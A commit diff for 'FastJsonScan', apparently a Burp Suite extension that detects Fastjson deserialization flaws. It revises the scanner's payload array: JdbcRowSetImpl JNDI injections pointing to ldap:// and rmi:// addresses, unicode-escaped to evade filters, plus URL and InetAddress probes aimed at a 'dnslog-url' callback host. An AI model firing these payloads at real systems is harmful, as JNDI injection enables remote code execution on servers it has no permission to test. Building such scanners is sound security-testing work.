检测规则优化,payload优化

src/main/java/burp/Application/FastJsonFingerprintDetection/FastJsonFingerprint.java

@@ -28,13 +28,11 @@ private FastJsonFingerprintTypeInterface init(IBurpExtenderCallbacks callbacks,
                                                   BurpAnalyzedRequest baseAnalyzedRequest,
                                                   String callClassName) {
         String[] payloads = {
-                "{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://dnslog-url/miao1\",\"autoCommit\":true}}",
-                "{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://dnslog-url/miao2\",\"autoCommit\":true}}",
-                "{\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://dnslog-url/miao3\",\"autoCommit\":true}}",
-                "{\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://dnslog-url/miao4\",\"autoCommit\":true}}",
-                "{\"name\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u006a\\u0061\\u0076\\u0061\\u002e\\u006c\\u0061\\u006e\\u0067\\u002e\\u0043\\u006c\\u0061\\u0073\\u0073\",\"\\u0076\\u0061\\u006c\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\"},\"x\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\",\"\\u0064\\u0061\\u0074\\u0061\\u0053\\u006f\\u0075\\u0072\\u0063\\u0065\\u004e\\u0061\\u006d\\u0065\":\"ldap://dnslog-url/miao5\",\"autoCommit\":true}}",
-                "{\"name\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u006a\\u0061\\u0076\\u0061\\u002e\\u006c\\u0061\\u006e\\u0067\\u002e\\u0043\\u006c\\u0061\\u0073\\u0073\",\"\\u0076\\u0061\\u006c\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\"},\"x\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\",\"\\u0064\\u0061\\u0074\\u0061\\u0053\\u006f\\u0075\\u0072\\u0063\\u0065\\u004e\\u0061\\u006d\\u0065\":\"rmi://dnslog-url/miao6\",\"autoCommit\":true}}",
-                "{\"a\":{\"@type\":\"com.alibaba.fastjson.JSONObject\",{\"@type\":\"java.net.URL\",\"val\":\"http://dnslog-url/miao5\"}}\"\"},\"b\":{{\"@type\":\"java.net.URL\",\"val\":\"http://dnslog-url/miao5\"}:\"x\"},\"c\":{{\"@type\":\"java.net.URL\",\"val\":\"http://dnslog-url/miao7\"}:0,\"d\":Set[{\"@type\":\"java.net.URL\",\"val\":\"http://dnslog-url/miao5\"}],\"e\":Set[{\"@type\":\"java.net.URL\",\"val\":\"http://dnslog-url/miao5\"},}",
+                "{\"name\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u006a\\u0061\\u0076\\u0061\\u002e\\u006c\\u0061\\u006e\\u0067\\u002e\\u0043\\u006c\\u0061\\u0073\\u0073\",\"\\u0076\\u0061\\u006c\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\"},\"x\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\",\"\\u0064\\u0061\\u0074\\u0061\\u0053\\u006f\\u0075\\u0072\\u0063\\u0065\\u004e\\u0061\\u006d\\u0065\":\"ldap://dnslog-url/miao1\",\"autoCommit\":true}}",
+                "{\"name\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u006a\\u0061\\u0076\\u0061\\u002e\\u006c\\u0061\\u006e\\u0067\\u002e\\u0043\\u006c\\u0061\\u0073\\u0073\",\"\\u0076\\u0061\\u006c\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\"},\"x\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\",\"\\u0064\\u0061\\u0074\\u0061\\u0053\\u006f\\u0075\\u0072\\u0063\\u0065\\u004e\\u0061\\u006d\\u0065\":\"rmi://dnslog-url/miao2\",\"autoCommit\":true}}",
+                "{\"b\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\",\"\\u0064\\u0061\\u0074\\u0061\\u0053\\u006f\\u0075\\u0072\\u0063\\u0065\\u004e\\u0061\\u006d\\u0065\":\"ldap://dnslog-url/miao3\",\"autoCommit\":true}}",
+                "{\"b\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\",\"\\u0064\\u0061\\u0074\\u0061\\u0053\\u006f\\u0075\\u0072\\u0063\\u0065\\u004e\\u0061\\u006d\\u0065\":\"rmi://dnslog-url/miao4\",\"autoCommit\":true}}",
+                "{\"a\":{\"@type\":\"com.alibaba.fastjson.JSONObject\",{\"@type\":\"java.net.URL\",\"val\":\"http://dnslog-url/miao5\"}}\"\"},\"b\":{{\"@type\":\"java.net.URL\",\"val\":\"http://dnslog-url/miao6\"}:\"x\"},\"c\":{{\"@type\":\"java.net.URL\",\"val\":\"http://dnslog-url/miao7\"}:0,\"d\":Set[{\"@type\":\"java.net.URL\",\"val\":\"http://dnslog-url/miao8\"}],\"e\":Set[{\"@type\":\"java.net.URL\",\"val\":\"http://dnslog-url/miao9\"},}",
                 "{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"dnslog-url\"}}",
                 "{\"@type\":\"java.net.Inet4Address\",\"val\":\"dnslog-url\"}",
                 "{\"@type\":\"java.net.Inet6Address\",\"val\":\"dnslog-url\"}"

src/main/java/burp/Bootstrap/BurpAnalyzedRequest.java

@@ -19,7 +19,7 @@ public class BurpAnalyzedRequest {
 
     public BurpAnalyzedRequest(IBurpExtenderCallbacks callbacks, IHttpRequestResponse requestResponse) {
         this.callbacks = callbacks;
-        this.helpers = callbacks.getHelpers();
+        this.helpers = this.callbacks.getHelpers();
 
         this.customHelpers = new CustomHelpers();
 
@@ -55,6 +55,7 @@ public boolean isRequestParameterContentJson() {
 
     /**
      * 获取请求的Body内容
+     *
      * @param httpRequestResponse
      * @return String
      */
@@ -78,13 +79,19 @@ private String getHttpRequestBody(IHttpRequestResponse httpRequestResponse) {
      * 设置提取所有的json参数
      */
     public void setJsonParameters() {
-        byte contentType = this.analyzeRequest().getContentType();
-
-        if (contentType == 4) {
+        if (this.analyzeRequest().getParameters().isEmpty()) {
             return;
         }
 
         for (IParameter p : this.analyzeRequest().getParameters()) {
+            if (p.getType() == 2 || p.getType() == 6) {
+                continue;
+            }
+
+            if (p.getName() == null || "".equals(p.getName())) {
+                continue;
+            }
+
             if (this.customHelpers.isJson(this.helpers.urlDecode(p.getValue()))) {
                 this.jsonParameters.add(p);
             }

src/main/java/burp/BurpExtender.java

@@ -14,7 +14,7 @@
 public class BurpExtender implements IBurpExtender, IScannerCheck {
 
     public static String NAME = "FastJsonScan";
-    public static String VERSION = "1.0.3";
+    public static String VERSION = "1.0.4";
 
     private IBurpExtenderCallbacks callbacks;
     private IExtensionHelpers helpers;